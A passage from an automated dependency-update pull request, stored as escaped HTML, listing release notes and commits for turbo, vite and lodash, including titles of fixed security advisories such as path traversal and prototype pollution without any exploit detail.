injection\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eLow:\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/turborepo/security/advisories/GHSA-hcf7-66rw-9f5r\"\u003eGHSA-hcf7-66rw-9f5r: Login callback CSRF/session fixation\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/turborepo/security/advisories/GHSA-3qcw-2rhx-2726\"\u003eGHSA-3qcw-2rhx-2726: Unexpected local code execution during Yarn Berry detection\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003ch3\u003eChangelog\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003erelease(turborepo): 2.9.12 by \u003ca href=\"https://github.com/github-actions\"\u003e\u003ccode\u003e@​github-actions\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/vercel/turborepo/pull/12774\"\u003evercel/turborepo#12774\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: Restore docs mobile menu by \u003ca href=\"https://github.com/anthonyshew\"\u003e\u003ccode\u003e@​anthonyshew\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vercel/turborepo/pull/12782\"\u003evercel/turborepo#12782\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci: Use \u003ccode\u003epull_request\u003c/code\u003e for PR title linting by \u003ca href=\"https://github.com/anthonyshew\"\u003e\u003ccode\u003e@​anthonyshew\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vercel/turborepo/pull/12787\"\u003evercel/turborepo#12787\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci: Scope GitHub Actions caches by branch by \u003ca href=\"https://github.com/anthonyshew\"\u003e\u003ccode\u003e@​anthonyshew\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vercel/turborepo/pull/12788\"\u003evercel/turborepo#12788\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003etest: Validate lockfiles without dependency downloads by \u003ca href=\"https://github.com/anthonyshew\"\u003e\u003ccode\u003e@​anthonyshew\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vercel/turborepo/pull/12789\"\u003evercel/turborepo#12789\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRemoved unneeded import form hash creation script in docs by \u003ca href=\"https://github.com/dancrumb\"\u003e\u003ccode\u003e@​dancrumb\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vercel/turborepo/pull/12799\"\u003evercel/turborepo#12799\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: Validate auth callback state by \u003ca href=\"https://github.com/anthonyshew\"\u003e\u003ccode\u003e@​anthonyshew\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vercel/turborepo/pull/12802\"\u003evercel/turborepo#12802\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: Harden VS Code extension command execution by \u003ca href=\"https://github.com/anthonyshew\"\u003e\u003ccode\u003e@​anthonyshew\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vercel/turborepo/pull/12800\"\u003evercel/turborepo#12800\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: Avoid project-local Yarn during detection by \u003ca href=\"https://github.com/anthonyshew\"\u003e\u003ccode\u003e@​anthonyshew\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vercel/turborepo/pull/12801\"\u003evercel/turborepo#12801\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore: Release 2.9.13 by \u003ca href=\"https://github.com/anthonyshew\"\u003e\u003ccode\u003e@​anthonyshew\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vercel/turborepo/pull/12803\"\u003evercel/turborepo#12803\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/dancrumb\"\u003e\u003ccode\u003e@​dancrumb\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/vercel/turborepo/pull/12799\"\u003evercel/turborepo#12799\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/vercel/turborepo/compare/v2.9.12...v2.9.14\"\u003ehttps://github.com/vercel/turborepo/compare/v2.9.12...v2.9.14\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003eTurborepo v2.9.13-canary.1\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003ch3\u003eChangelog\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003erelease(turborepo): 2.9.11-canary.7 by \u003ca href=\"https://github.com/github-actions\"\u003e\u003ccode\u003e@​github-actions\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/vercel/turborepo/pull/12768\"\u003evercel/turborepo#12768\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: Allow \u003ccode\u003e$TURBO_EXTENDS$\u003c/code\u003e in LSP diagnostics by \u003ca href=\"https://github.com/anthonyshew\"\u003e\u003ccode\u003e@​anthonyshew\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vercel/turborepo/pull/12770\"\u003evercel/turborepo#12770\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003erelease(turborepo): 2.9.11 by \u003ca href=\"https://github.com/github-actions\"\u003e\u003ccode\u003e@​github-actions\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/vercel/turborepo/pull/12771\"\u003evercel/turborepo#12771\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: Allow transit nodes in LSP diagnostics by \u003ca href=\"https://github.com/anthonyshew\"\u003e\u003ccode\u003e@​anthonyshew\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vercel/turborepo/pull/12773\"\u003evercel/turborepo#12773\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003erelease(turborepo): 2.9.12 by \u003ca href=\"https://github.com/github-actions\"\u003e\u003ccode\u003e@​github-actions\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/vercel/turborepo/pull/12774\"\u003evercel/turborepo#12774\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: Restore docs mobile menu by \u003ca href=\"https://github.com/anthonyshew\"\u003e\u003ccode\u003e@​anthonyshew\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vercel/turborepo/pull/12782\"\u003evercel/turborepo#12782\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci: Use \u003ccode\u003epull_request\u003c/code\u003e for PR title linting by \u003ca href=\"https://github.com/anthonyshew\"\u003e\u003ccode\u003e@​anthonyshew\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vercel/turborepo/pull/12787\"\u003evercel/turborepo#12787\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci: Scope GitHub Actions caches by branch by \u003ca href=\"https://github.com/anthonyshew\"\u003e\u003ccode\u003e@​anthonyshew\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vercel/turborepo/pull/12788\"\u003evercel/turborepo#12788\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003etest: Validate lockfiles without dependency downloads by \u003ca href=\"https://github.com/anthonyshew\"\u003e\u003ccode\u003e@​anthonyshew\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vercel/turborepo/pull/12789\"\u003evercel/turborepo#12789\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRemoved unneeded import form hash creation script in docs by \u003ca href=\"https://github.com/dancrumb\"\u003e\u003ccode\u003e@​dancrumb\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vercel/turborepo/pull/12799\"\u003evercel/turborepo#12799\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: Validate auth callback state by \u003ca href=\"https://github.com/anthonyshew\"\u003e\u003ccode\u003e@​anthonyshew\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vercel/turborepo/pull/12802\"\u003evercel/turborepo#12802\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: Harden VS Code extension command execution by \u003ca href=\"https://github.com/anthonyshew\"\u003e\u003ccode\u003e@​anthonyshew\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vercel/turborepo/pull/12800\"\u003evercel/turborepo#12800\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: Avoid project-local Yarn during detection by \u003ca href=\"https://github.com/anthonyshew\"\u003e\u003ccode\u003e@​anthonyshew\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vercel/turborepo/pull/12801\"\u003evercel/turborepo#12801\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/turborepo/commit/fc62fe0d9c347d1d24f0ed8946284856593ddb93\"\u003e\u003ccode\u003efc62fe0\u003c/code\u003e\u003c/a\u003e publish 2.9.14 to registry\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/turborepo/commit/fb8c9aec0f9e83f95783659a5ce9c4478cf62cb9\"\u003e\u003ccode\u003efb8c9ae\u003c/code\u003e\u003c/a\u003e chore: Release 2.9.13 (\u003ca href=\"https://redirect.github.com/vercel/turborepo/issues/12803\"\u003e#12803\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/turborepo/commit/e8e629da4e1fb75231089e91b19be9d327a3e649\"\u003e\u003ccode\u003ee8e629d\u003c/code\u003e\u003c/a\u003e fix: Avoid project-local Yarn during detection (\u003ca href=\"https://redirect.github.com/vercel/turborepo/issues/12801\"\u003e#12801\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/turborepo/commit/91c90cbf12f524c5c29b713d6472dd5fcdecb309\"\u003e\u003ccode\u003e91c90cb\u003c/code\u003e\u003c/a\u003e fix: Harden VS Code extension command execution (\u003ca href=\"https://redirect.github.com/vercel/turborepo/issues/12800\"\u003e#12800\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/turborepo/commit/84f450894e87da1eed864d51f6f637f26980d560\"\u003e\u003ccode\u003e84f4508\u003c/code\u003e\u003c/a\u003e fix: Validate auth callback state (\u003ca href=\"https://redirect.github.com/vercel/turborepo/issues/12802\"\u003e#12802\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/turborepo/commit/1779ad7901384f106236a6e196059e4929745514\"\u003e\u003ccode\u003e1779ad7\u003c/code\u003e\u003c/a\u003e Removed unneeded import form hash creation script in docs (\u003ca href=\"https://redirect.github.com/vercel/turborepo/issues/12799\"\u003e#12799\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/turborepo/commit/71f8c90a807ffb9b9876ea8a04f523f473bf5c8d\"\u003e\u003ccode\u003e71f8c90\u003c/code\u003e\u003c/a\u003e test: Validate lockfiles without dependency downloads (\u003ca href=\"https://redirect.github.com/vercel/turborepo/issues/12789\"\u003e#12789\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/turborepo/commit/5fcb96024d503127bb0ed760ebe159b7716c52b3\"\u003e\u003ccode\u003e5fcb960\u003c/code\u003e\u003c/a\u003e ci: Scope GitHub Actions caches by branch (\u003ca href=\"https://redirect.github.com/vercel/turborepo/issues/12788\"\u003e#12788\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/turborepo/commit/4cf9fabc9a6f6c99fe4e2f2da9f35be631be062a\"\u003e\u003ccode\u003e4cf9fab\u003c/code\u003e\u003c/a\u003e ci: Use \u003ccode\u003epull_request\u003c/code\u003e for PR title linting (\u003ca href=\"https://redirect.github.com/vercel/turborepo/issues/12787\"\u003e#12787\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/turborepo/commit/859c629bc401f239ac7980a132746ca90478e17c\"\u003e\u003ccode\u003e859c629\u003c/code\u003e\u003c/a\u003e fix: Restore docs mobile menu (\u003ca href=\"https://redirect.github.com/vercel/turborepo/issues/12782\"\u003e#12782\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/vercel/turborepo/compare/v2.5.2...v2.9.14\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~GitHub%20Actions\"\u003eGitHub Actions\u003c/a\u003e, a new releaser for turbo since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `vite` from 6.3.4 to 6.4.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/vitejs/vite/releases\"\u003evite's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev6.4.2\u003c/h2\u003e\n\u003cp\u003ePlease refer to \u003ca href=\"https://github.com/vitejs/vite/blob/v6.4.2/packages/vite/CHANGELOG.md\"\u003eCHANGELOG.md\u003c/a\u003e for details.\u003c/p\u003e\n\u003ch2\u003ev6.4.1\u003c/h2\u003e\n\u003cp\u003ePlease refer to \u003ca href=\"https://github.com/vitejs/vite/blob/v6.4.1/packages/vite/CHANGELOG.md\"\u003eCHANGELOG.md\u003c/a\u003e for details.\u003c/p\u003e\n\u003ch2\u003ev6.4.0\u003c/h2\u003e\n\u003cp\u003ePlease refer to \u003ca href=\"https://github.com/vitejs/vite/blob/v6.4.0/packages/vite/CHANGELOG.md\"\u003eCHANGELOG.md\u003c/a\u003e for details.\u003c/p\u003e\n\u003ch2\u003ev6.3.7\u003c/h2\u003e\n\u003cp\u003ePlease refer to \u003ca href=\"https://github.com/vitejs/vite/blob/v6.3.7/packages/vite/CHANGELOG.md\"\u003eCHANGELOG.md\u003c/a\u003e for details.\u003c/p\u003e\n\u003ch2\u003ev6.3.6\u003c/h2\u003e\n\u003cp\u003ePlease refer to \u003ca href=\"https://github.com/vitejs/vite/blob/v6.3.6/packages/vite/CHANGELOG.md\"\u003eCHANGELOG.md\u003c/a\u003e for details.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/vitejs/vite/blob/v6.4.2/packages/vite/CHANGELOG.md\"\u003evite's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003c!-- raw HTML omitted --\u003e6.4.2 (2026-04-06)\u003c!-- raw HTML omitted --\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: apply server.fs check to env transport (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/22159\"\u003e#22159\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/22163\"\u003e#22163\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/commit/fe28e47e9463e4c9619f94bfa06d2f8f1411b44b\"\u003efe28e47\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/22159\"\u003e#22159\u003c/a\u003e \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/22163\"\u003e#22163\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: avoid path traversal with optimize deps sourcemap handler (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/22161\"\u003e#22161\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/commit/ca4da5d1fb45c9cfdce606aa30825095791b164b\"\u003eca4da5d\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/22161\"\u003e#22161\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003c!-- raw HTML omitted --\u003e6.4.1 (2025-10-20)\u003c!-- raw HTML omitted --\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix(dev): trim trailing slash before \u003ccode\u003eserver.fs.deny\u003c/code\u003e check (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/20968\"\u003e#20968\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/20969\"\u003e#20969\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/commit/1114b5d7ea03e26572708715343bec69db4536e8\"\u003e1114b5d\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/20968\"\u003e#20968\u003c/a\u003e \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/20969\"\u003e#20969\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e6.4.0 (2025-10-15)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efeat: allow passing down resolved config to vite's createServer (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/20932\"\u003e#20932\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/commit/ca6455ee9eb6111a9caa9810506a1b9ac96a520a\"\u003eca6455e\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/20932\"\u003e#20932\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003c!-- raw HTML omitted --\u003e6.3.7 (2025-10-14)\u003c!-- raw HTML omitted --\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix(esbuild): inject esbuild helpers correctly for esbuild 0.25.9+ (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/20940\"\u003e#20940\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/commit/c59a222aa584c087cfe710173de1b9ecb597a3ff\"\u003ec59a222\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/20940\"\u003e#20940\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003c!-- raw HTML omitted --\u003e6.3.6 (2025-09-08)\u003c!-- raw HTML omitted --\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: apply \u003ccode\u003efs.strict\u003c/code\u003e check to HTML files (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/20736\"\u003e#20736\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/commit/0ab19ea9fcb66f544328f442cf6e70f7c0528d5f\"\u003e0ab19ea\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/20736\"\u003e#20736\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: upgrade sirv to 3.0.2 (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/20735\"\u003e#20735\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/commit/e11d24008b97d4ca731ecc1a3b95260a6d12e7e0\"\u003ee11d240\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/20735\"\u003e#20735\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003etest: detect ts support via \u003ccode\u003eprocess.features\u003c/code\u003e (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/20544\"\u003e#20544\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/commit/7d9922972b62329d37a71d4da5a4a382d0bf8a79\"\u003e7d99229\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/20544\"\u003e#20544\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003c!-- raw HTML omitted --\u003e6.3.5 (2025-05-05)\u003c!-- raw HTML omitted --\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix(ssr): handle uninitialized export access as undefined (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19959\"\u003e#19959\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/commit/fd38d076fe2455aac1e00a7b15cd51159bf12bb5\"\u003efd38d07\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/19959\"\u003e#19959\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/vite/commit/6b3fad02abd550bd7b79934ff92c58dbd7f33045\"\u003e\u003ccode\u003e6b3fad0\u003c/code\u003e\u003c/a\u003e release: v6.4.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/vite/commit/ca4da5d1fb45c9cfdce606aa30825095791b164b\"\u003e\u003ccode\u003eca4da5d\u003c/code\u003e\u003c/a\u003e fix: avoid path traversal with optimize deps sourcemap handler (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/22161\"\u003e#22161\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/vite/commit/fe28e47e9463e4c9619f94bfa06d2f8f1411b44b\"\u003e\u003ccode\u003efe28e47\u003c/code\u003e\u003c/a\u003e fix: apply server.fs check to env transport (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/22159\"\u003e#22159\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/22163\"\u003e#22163\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/vite/commit/5487f4f641f70c47ea05fd101a4319897df048b3\"\u003e\u003ccode\u003e5487f4f\u003c/code\u003e\u003c/a\u003e release: v6.4.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/vite/commit/1114b5d7ea03e26572708715343bec69db4536e8\"\u003e\u003ccode\u003e1114b5d\u003c/code\u003e\u003c/a\u003e fix(dev): trim trailing slash before \u003ccode\u003eserver.fs.deny\u003c/code\u003e check (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/20968\"\u003e#20968\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/20969\"\u003e#20969\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/vite/commit/f12697c0f64b9a37196b9ab218a0911829d5b103\"\u003e\u003ccode\u003ef12697c\u003c/code\u003e\u003c/a\u003e release: v6.4.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/vite/commit/ca6455ee9eb6111a9caa9810506a1b9ac96a520a\"\u003e\u003ccode\u003eca6455e\u003c/code\u003e\u003c/a\u003e feat: allow passing down resolved config to vite's createServer (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/20932\"\u003e#20932\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/vite/commit/0e173d83681daa31be10fa8a62d56b1ec84690af\"\u003e\u003ccode\u003e0e173d8\u003c/code\u003e\u003c/a\u003e release: v6.3.7\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/vite/commit/c59a222aa584c087cfe710173de1b9ecb597a3ff\"\u003e\u003ccode\u003ec59a222\u003c/code\u003e\u003c/a\u003e fix(esbuild): inject esbuild helpers correctly for esbuild 0.25.9+ (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/20940\"\u003e#20940\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/vite/commit/3f337c5e24504e51188d29c970de1416ee523dbb\"\u003e\u003ccode\u003e3f337c5\u003c/code\u003e\u003c/a\u003e release: v6.3.6\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/vitejs/vite/commits/v6.4.2/packages/vite\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~GitHub%20Actions\"\u003eGitHub Actions\u003c/a\u003e, a new releaser for vite since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `lodash` from 4.17.21 to 4.18.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/lodash/lodash/releases\"\u003elodash's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e4.18.1\u003c/h2\u003e\n\u003ch2\u003eBugs\u003c/h2\u003e\n\u003cp\u003eFixes a \u003ccode\u003eReferenceError\u003c/code\u003e issue in \u003ccode\u003elodash\u003c/code\u003e \u003ccode\u003elodash-es\u003c/code\u003e \u003ccode\u003elodash-amd\u003c/code\u003e and \u003ccode\u003elodash.template\u003c/code\u003e when using the \u003ccode\u003etemplate\u003c/code\u003e and \u003ccode\u003efromPairs\u003c/code\u003e functions from the modular builds. See \u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6167#issuecomment-4165269769\"\u003elodash/lodash#6167\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003eThese defects were related to how lodash distributions are built from the main branch using \u003ca href=\"https://github.com/lodash-archive/lodash-cli\"\u003ehttps://github.com/lodash-archive/lodash-cli\u003c/a\u003e. When internal dependencies change inside lodash functions, equivalent updates need to be made to a mapping in the lodash-cli. (hey, it was ahead of its time once upon a time!). We know this, but we missed it in the last release. It's the kind of thing that passes in CI, but fails bc the build is not the same thing you tested.\u003c/p\u003e\n\u003cp\u003eThere is no diff on main for this, but you can see the diffs for each of the npm packages on their respective branches:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003elodash\u003c/code\u003e: \u003ca href=\"https://github.com/lodash/lodash/compare/4.18.0-npm...4.18.1-npm\"\u003ehttps://github.com/lodash/lodash/compare/4.18.0-npm...4.18.1-npm\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003elodash-es\u003c/code\u003e: \u003ca href=\"https://github.com/lodash/lodash/compare/4.18.0-es...4.18.1-es\"\u003ehttps://github.com/lodash/lodash/compare/4.18.0-es...4.18.1-es\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003elodash-amd\u003c/code\u003e: \u003ca href=\"https://github.com/lodash/lodash/compare/4.18.0-amd...4.18.1-amd\"\u003ehttps://github.com/lodash/lodash/compare/4.18.0-amd...4.18.1-amd\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003elodash.template\u003c/code\u003e\u003ca href=\"https://github.com/lodash/lodash/compare/4.18.0-npm-packages...4.18.1-npm-packages\"\u003ehttps://github.com/lodash/lodash/compare/4.18.0-npm-packages...4.18.1-npm-packages\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e4.18.0\u003c/h2\u003e\n\u003ch2\u003ev4.18.0\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/lodash/lodash/compare/4.17.23...4.18.0\"\u003ehttps://github.com/lodash/lodash/compare/4.17.23...4.18.0\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ccode\u003e_.unset\u003c/code\u003e / \u003ccode\u003e_.omit\u003c/code\u003e\u003c/strong\u003e: Fixed prototype pollution via \u003ccode\u003econstructor\u003c/code\u003e/\u003ccode\u003eprototype\u003c/code\u003e path traversal (\u003ca href=\"https://github.com/lodash/lodash/security/advisories/GHSA-f23m-r3pf-42rh\"\u003eGHSA-f23m-r3pf-42rh\u003c/a\u003e, \u003ca href=\"https://github.com/lodash/lodash/commit/fe8d32eda854377349a4f922ab7655c8e5df9a0b\"\u003efe8d32e\u003c/a\u003e). Previously, array-wrapped path segments and primitive roots could bypass the existing guards, allowing deletion of properties from built-in prototypes. Now \u003ccode\u003econstructor\u003c/code\u003e and \u003ccode\u003eprototype\u003c/code\u003e are blocked unconditionally as non-terminal path keys, matching 